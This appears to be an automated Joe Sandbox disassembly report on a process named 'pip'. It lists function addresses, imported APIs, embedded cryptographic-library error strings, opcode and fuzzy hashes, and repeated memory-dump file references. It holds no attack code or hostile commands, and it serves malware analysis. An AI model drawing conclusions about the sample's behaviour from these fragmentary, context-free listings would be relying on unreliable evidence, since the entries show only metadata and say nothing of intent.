Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ByteCharMultiWide$StringType__freea_malloc_memset
String ID:
API String ID: 525495869-0
Opcode ID: f2854d542e054fbe1627cc9492187841c82165c310d964e028dac0141b35ac3d
Instruction ID: 272e34536b9d556e6d3855b4a1621135611e8e1b63fcda5ef782b00fc80b7f43
Opcode Fuzzy Hash: f2854d542e054fbe1627cc9492187841c82165c310d964e028dac0141b35ac3d
Instruction Fuzzy Hash: 6331BDB160020AAFEF00CF68DC94EAF7BACEB18358F504225FA14D2655E731DD248B60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08A39 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 6CF069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CF06A08
Part of subcall function 6CF069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CF06A15
Part of subcall function 6CF069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CF06A41

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Destroy$Bound$Element
String ID:
API String ID: 757764206-0
Opcode ID: 50851b5bd5e16ee59cbae5d23df9580af23b42163fb9ce88a9f58670dfb4b210
Instruction ID: b473858ed44d1848cad02c713f9adf3b8eaced17a23a73514dd9eedb244020d9
Opcode Fuzzy Hash: 50851b5bd5e16ee59cbae5d23df9580af23b42163fb9ce88a9f58670dfb4b210
Instruction Fuzzy Hash: 09312871F016189FCB10CB69CC90B9EB7FAAF89604F64868AE419E7641C775E9809F50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF406A0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328COMMON

Download Yara Rule

APIs

Part of subcall function 6CEE4760: __CxxThrowException@8.LIBCMT ref: 6CEE47F9

_memmove.LIBCMT ref: 6CF40907
_memmove.LIBCMT ref: 6CF40936
_memmove.LIBCMT ref: 6CF40959
__CxxThrowException@8.LIBCMT ref: 6CF40A25

Strings

PSSR_MEM: message recovery disabled, xrefs: 6CF409E3

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID: PSSR_MEM: message recovery disabled
API String ID: 2655171816-3051149714
Opcode ID: d12383c943abeea5a890cf3b1fad70c960d6642d300b99d843ab9a0cdb940d61
Instruction ID: 62c5e0db0165927eb31fe0d5eecca9baf097a3a5b70f604a3c2237ffc2e435a4
Opcode Fuzzy Hash: d12383c943abeea5a890cf3b1fad70c960d6642d300b99d843ab9a0cdb940d61
Instruction Fuzzy Hash: 57C189756083819FD714CF28C980B6BBBE5BFD9304F148A5DE5898B382DB74E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF3AE90 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

type_info::operator!=.LIBCMT ref: 6CF3AF27
_strncmp.LIBCMT ref: 6CF3AFA6

Strings

ThisPointer:, xrefs: 6CF3AF4B, 6CF3AFA0
ValueNames, xrefs: 6CF3AEB7

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _strncmptype_info::operator!=
String ID: ThisPointer:$ValueNames
API String ID: 1333309372-2375088429
Opcode ID: 4ffb919ee25925582688084e745eecbec0f784df20a39c6a907fb74da6a5486f
Instruction ID: b90f4a4cfad51ada9da1e027777a1e46946b33f418f439f8d13323e8b57a2cdb
Opcode Fuzzy Hash: 4ffb919ee25925582688084e745eecbec0f784df20a39c6a907fb74da6a5486f
Instruction Fuzzy Hash: BD51C7712087506BD714CFB6D890E67BBFA9F86348F045A5DE4DA87B81C722E809C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF6C60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEF6C73
SafeArrayAccessData.OLEAUT32(00000000,<ll), ref: 6CEF6C87
_memmove.LIBCMT ref: 6CEF6C9A
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEF6CA3

Strings

<ll, xrefs: 6CEF6C64, 6CEF6C7B, 6CEF6C7E

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
String ID: <ll
API String ID: 3147195435-3419007484
Opcode ID: 7ffb5bb593d4835753dc4e8368ec81260752cb3674b8155a64a29d4a65920d5d
Instruction ID: 8acc425d505ccf4d643e50623db5cd0c81c298682df8738c5799d8f3e46f795e
Opcode Fuzzy Hash: 7ffb5bb593d4835753dc4e8368ec81260752cb3674b8155a64a29d4a65920d5d
Instruction Fuzzy Hash: 62F05E75311214BBEB11AF52DCA9F973FBCEF86760F018015FA288A240E670D500ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 06F80F14 Relevance: 7.7, Strings: 6, Instructions: 201COMMON

Download Yara Rule

Strings

HERE, xrefs: 06F80F6F
HERE, xrefs: 06F81086
LOOK, xrefs: 06F80F6A
p<tq, xrefs: 06F81177
p<tq, xrefs: 06F8112C
LOOK, xrefs: 06F81081

Memory Dump Source

Source File: 00000016.00000002.2940861181.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6f80000_pip.jbxd

Similarity

API ID:
String ID: HERE$HERE$LOOK$LOOK$p<tq$p<tq
API String ID: 0-949090392
Opcode ID: a9efb777f75a0f99ab6f1985632ccac3c5bb05bdadbff77b4809cb723267240d
Instruction ID: 42e3a3d7d0f6ac877858e238c9db7849630bf20c1ec7005b9bed7d4066790a8b
Opcode Fuzzy Hash: a9efb777f75a0f99ab6f1985632ccac3c5bb05bdadbff77b4809cb723267240d
Instruction Fuzzy Hash: 2DA182B4E042298FDB68DF69C984BD9B7B1BB58310F1482E9D50DAB360DB309E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF6D40 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 6CF49BB5: _malloc.LIBCMT ref: 6CF49BCF

_rand.LIBCMT ref: 6CEF6DEA

Part of subcall function 6CF49E0C: __getptd.LIBCMT ref: 6CF49E0C

std::exception::exception.LIBCMT ref: 6CEF6E17
__CxxThrowException@8.LIBCMT ref: 6CEF6E2C
std::exception::exception.LIBCMT ref: 6CEF6E3B
__CxxThrowException@8.LIBCMT ref: 6CEF6E50

Part of subcall function 6CF49BB5: std::exception::exception.LIBCMT ref: 6CF49C04
Part of subcall function 6CF49BB5: std::exception::exception.LIBCMT ref: 6CF49C1E
Part of subcall function 6CF49BB5: __CxxThrowException@8.LIBCMT ref: 6CF49C2F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$__getptd_malloc_rand
String ID:
API String ID: 2791304714-0
Opcode ID: 70975eed20eeed7d315c8398a7049f565402df0bd56d9ab29a053ee0fe9385eb
Instruction ID: ead04d83c3ca20546f3a431d43dfcdf52532594ce9002e0bb21520d29c6667d9
Opcode Fuzzy Hash: 70975eed20eeed7d315c8398a7049f565402df0bd56d9ab29a053ee0fe9385eb
Instruction Fuzzy Hash: 793117B19007449FC760CF69C480A9AFBF4FB08314F54C96ED85A97B42D775E608CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2E6E0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 331COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CF2E76F
_memcpy_s.LIBCMT ref: 6CF2E78B

Strings

, xrefs: 6CF2E85A

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-3916222277
Opcode ID: 431b51843584df5e4db874e8cb233c57918f558a2ce9241905f2ab761e350d1a
Instruction ID: ebfe9d53b3c5ae3417f4d2369de2549433c29759714305ec18d94d971bdbe0ba
Opcode Fuzzy Hash: 431b51843584df5e4db874e8cb233c57918f558a2ce9241905f2ab761e350d1a
Instruction Fuzzy Hash: 01C18C756093028FD704CF78C89066AB7E1FFC9319F244A2DE495C7650E738EA49CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6CF48B60 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 6CF48C40
_memset.LIBCMT ref: 6CF48C56
_memmove.LIBCMT ref: 6CF48DA8

Strings

EncodingParameters, xrefs: 6CF48CD6

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: _memcpy_s_memmove_memset
String ID: EncodingParameters
API String ID: 4034675494-55378216
Opcode ID: 21ccba05856723553185954a504538c485c529aa60f15ee279a60fd939db28d0
Instruction ID: e8c7220a2dbc2a240f8375a49f05b390bacc73fc5557932e90eb62bb4acfc52b
Opcode Fuzzy Hash: 21ccba05856723553185954a504538c485c529aa60f15ee279a60fd939db28d0
Instruction Fuzzy Hash: 2D917A746093819FE700CF28C880B5BBFE5AFDA708F14891EF99887352D675E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CEF8560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6CEF88ED

Part of subcall function 6CF4A116: __mbstowcs_s_l.LIBCMT ref: 6CF4A12C

__cftoe.LIBCMT ref: 6CEF8911

Strings

P, xrefs: 6CEF8841
zX, xrefs: 6CEF865E

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: 6db8fa608863a4bdb2811bf882120df541f0abd0e95e0ac2814ecc78b906c1b9
Instruction ID: 222cc8652e1663501a6630b1c3d502e9a654764d498dc50eb8f6a94fc126f05c
Opcode Fuzzy Hash: 6db8fa608863a4bdb2811bf882120df541f0abd0e95e0ac2814ecc78b906c1b9
Instruction Fuzzy Hash: 67910FB11087819FC376CF15C880BABBBF8AB89714F508A1DE1AD4B290EB715605CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6CF189D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF18ABB
__CxxThrowException@8.LIBCMT ref: 6CF18B82

Strings

PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6CF18A8E
: invalid ciphertext, xrefs: 6CF18B48

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: bc8eb30495e969e90bd65af474c479276ead445611344458021d0cf6e437ce66
Instruction ID: 02f38b7d8bc2aa6a7a97582546c76e6e02286f816f671328259db4493f04149e
Opcode Fuzzy Hash: bc8eb30495e969e90bd65af474c479276ead445611344458021d0cf6e437ce66
Instruction Fuzzy Hash: AB515EB51087409FD324CF54D990EABB7F8EF89708F108A1DE59A93B51DB31E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6CF16B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6CEE4010: std::_Xinvalid_argument.LIBCPMT ref: 6CEE402A

__CxxThrowException@8.LIBCMT ref: 6CF16BA6

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

Part of subcall function 6CEE4010: std::_Xinvalid_argument.LIBCPMT ref: 6CEE4067
Part of subcall function 6CEE4010: _memmove.LIBCMT ref: 6CEE40C8

__CxxThrowException@8.LIBCMT ref: 6CF16C56

Strings

RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6CF16BE3
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6CF16B33

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1902190269-184618050
Opcode ID: f72882a42e7b5884a4cf6b723828817bd1801207fc2f6184cd813a2a0454c3b3
Instruction ID: af33162fc79972dd7b7b5b9381122edcec6e5fc551c65c7964ff443732696890
Opcode Fuzzy Hash: f72882a42e7b5884a4cf6b723828817bd1801207fc2f6184cd813a2a0454c3b3
Instruction Fuzzy Hash: 3E5148B1108380AFC310DF69C880A5BFBF8BB99754F504A1EF5A593B90D775D908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6CEE4E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEE4EFC
std::_Xinvalid_argument.LIBCPMT ref: 6CEE4F16
_memmove.LIBCMT ref: 6CEE4F6C

Part of subcall function 6CEE4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CEE4DA9
Part of subcall function 6CEE4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CEE4DCA
Part of subcall function 6CEE4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CEE4DE5
Part of subcall function 6CEE4D90: _memmove.LIBCMT ref: 6CEE4E4D

Strings

string too long, xrefs: 6CEE4EF7, 6CEE4F11

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 4464bb20bba6895845efe577fbb0177208f7b4a6707c6afe18919cacd9f48821
Instruction ID: 03c845ee4a8a07f53e38911954c851ad6e79d692cce026f6973bbf243e724565
Opcode Fuzzy Hash: 4464bb20bba6895845efe577fbb0177208f7b4a6707c6afe18919cacd9f48821
Instruction Fuzzy Hash: 373107323106104BD3259EDCE88096AF7FAEFD9BA4B30892FE5558BF91C7719844C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 6CF48E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(835FE394,835FE394), ref: 6CF48E7F
GetLastError.KERNEL32(0000000A), ref: 6CF48E8F

Part of subcall function 6CEE4010: std::_Xinvalid_argument.LIBCPMT ref: 6CEE402A

__CxxThrowException@8.LIBCMT ref: 6CF48F14

Part of subcall function 6CF4AC75: RaiseException.KERNEL32(?,?,6CF49C34,835FE394,?,?,?,?,6CF49C34,835FE394,6CF79C90,6CF8B974,835FE394), ref: 6CF4ACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6CF48EA5

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: 222a54d0333f1933919a325da1b285f09a414a52f9285f2dea837bb3e1cc6781
Instruction ID: e6250cbf325f15b533959304e6c9d0feba5ce46d13ca9a807fff9f6e1cf2199e
Opcode Fuzzy Hash: 222a54d0333f1933919a325da1b285f09a414a52f9285f2dea837bb3e1cc6781
Instruction Fuzzy Hash: 81211DB1508380AFD310DF25C841B9BBBE8BB89654F508A1EF5A992781DB7595088BA3

Uniqueness

